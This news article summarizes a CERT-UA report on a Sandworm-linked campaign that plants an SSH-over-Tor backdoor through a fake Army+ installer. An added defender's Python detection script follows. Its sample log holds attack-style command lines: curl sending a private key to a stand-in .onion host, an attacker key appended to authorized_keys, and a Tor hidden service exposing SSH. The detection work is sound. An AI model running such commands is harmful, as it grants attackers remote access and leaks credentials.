The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted a malicious campaign targeting Ukrainian military personnel that exploits Cloudflare Workers to distribute malware disguised as Army+, a legitimate mobile application. The app was originally introduced by Ukraine’s Ministry of Defense in August 2024 to facilitate paperless processes within the armed forces.
Victims are lured to fraudulent websites hosted via Cloudflare Workers, where they are prompted to download a Windows executable version of Army+ labeled "ArmyPlusInstaller-v.0.10.23722.exe." The installer is crafted using the Nullsoft Scriptable Install System (NSIS), a common open-source tool for creating Windows installers.
When executed, the installer launches a decoy file to mask its malicious behavior and runs a PowerShell script that installs an OpenSSH server on the victim’s machine, generates an RSA key pair for secure communication, adds the attacker’s public key to the "authorized_keys" file to enable remote authentication, exfiltrates the private key using curl to a remote server hosted on the Tor network, and publishes a hidden SSH service on the victim's device via Tor.
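A defender's detection pass over process-creation logs for the persistence chain described above, as an added example that is not part of the CERT-UA report or this article. The log lines are constructed, and the command patterns (an OpenSSH.Server capability install, a write to authorized_keys, curl to a .onion host, tor with HiddenServicePort) are assumed stand-ins, not indicators from the page:

```python
"""Flag hosts whose process logs show several stages of the chain: install
OpenSSH server, add a key to authorized_keys, curl the private key to a Tor
.onion host, publish a Tor hidden service. Patterns are assumptions."""
import re
from collections import defaultdict

# Each stage: a label and an assumed regex over the process command line.
STAGES = [
    ("install_sshd", re.compile(r"OpenSSH\.Server|\bsshd\b", re.I)),
    ("authorized_keys", re.compile(r"authorized_keys", re.I)),
    ("exfil_to_tor", re.compile(r"\bcurl\b.*\.onion", re.I)),
    ("hidden_service", re.compile(r"HiddenServicePort", re.I)),
]

# Constructed sample log, one event per line: timestamp|host|image|command_line
SAMPLE_LOG = """\
2024-12-20T10:01:02|WS01|powershell.exe|Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
2024-12-20T10:01:40|WS01|powershell.exe|Add-Content C:\\ProgramData\\ssh\\administrators_authorized_keys 'ssh-rsa AAAA...'
2024-12-20T10:02:05|WS01|curl.exe|curl -x socks5h://127.0.0.1:9050 -F key=@C:\\Users\\u\\.ssh\\id_rsa http://example.onion/up
2024-12-20T10:02:30|WS01|tor.exe|tor --HiddenServiceDir C:\\ProgramData\\tor\\hs --HiddenServicePort "22 127.0.0.1:22"
2024-12-20T11:00:00|WS02|powershell.exe|Get-Content C:\\Users\\u\\.ssh\\authorized_keys
2024-12-20T11:05:00|WS03|curl.exe|curl https://example.com/update.json
"""

def parse(log_text):
    """Yield one event dict per non-empty log line."""
    for line in log_text.splitlines():
        ts, host, image, cmd = line.split("|", 3)
        yield {"ts": ts, "host": host, "image": image, "cmd": cmd}

def classify(event):
    """Return the set of chain stages this event's command line matches."""
    return {name for name, rx in STAGES if rx.search(event["cmd"])}

def find_chains(log_text, min_stages=2):
    """Map host -> {stage: first timestamp} for hosts hitting >= min_stages.
    A single stage (e.g. reading authorized_keys) is normal admin activity;
    several stages on one host is what makes this chain stand out."""
    per_host = defaultdict(dict)
    for ev in parse(log_text):
        for stage in classify(ev):
            per_host[ev["host"]].setdefault(stage, ev["ts"])
    return {h: s for h, s in per_host.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in find_chains(SAMPLE_LOG).items():
        print(host, sorted(stages))
```

In a real deployment the same logic runs over Sysmon event 1 or PowerShell script-block logs; correlating stages per host (and within a time window) is what keeps benign SSH administration from alerting.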
CERT-UA has linked this activity to UAC-0125 with a high level of confidence, further associating it with the larger cluster UAC-0002 (commonly referred to as APT44 or Sandworm). Sandworm is a notorious cyber-espionage group linked to Russian intelligence services.
This is not the first time the group has targeted Ukrainian entities. Earlier in 2024, UAC-0125 leveraged trojanized Microsoft Office packages, including "Office16.iso" files, as a primary compromise vector. These files contained malicious components, such as "omas-x-none.msp" and "CommunicatorContentBinApp.cmd," which executed PowerShell commands to initiate further infections.